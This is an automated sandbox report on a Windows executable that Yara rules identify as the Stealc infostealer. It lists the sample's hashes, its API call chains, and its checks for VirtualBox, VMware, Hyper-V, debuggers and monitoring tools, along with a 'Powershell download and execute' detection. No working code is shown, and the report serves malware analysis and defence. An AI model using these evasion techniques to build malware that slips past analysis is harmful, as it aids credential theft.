Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00353EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003416D0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00341160 GetSystemInfo,ExitProcess,

0_2_00341160

Source: file.exe, file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareH

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005A754D rdtsc

0_2_005A754D

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003445C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359750 mov eax, dword ptr fs:[00000030h]

0_2_00359750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: file.exe	Binary or memory string: ["kProgram Manager
Source: file.exe, 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ["kProgram Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00357B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00356920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00356920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00357A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1540694
Product:	CloudBasic
Start time:	01:09:04
Start date:	24.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c85bd4b2ad207a44d2cf47f0b48d6d09
SHA1:	3d20ea5592b7742bf5a05c166aa3e18c9d187681
SHA256:	294ee8a1545ecad7c74a8994fd7cd56acbdf3694ee80a77ba33e12c0067717d7
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by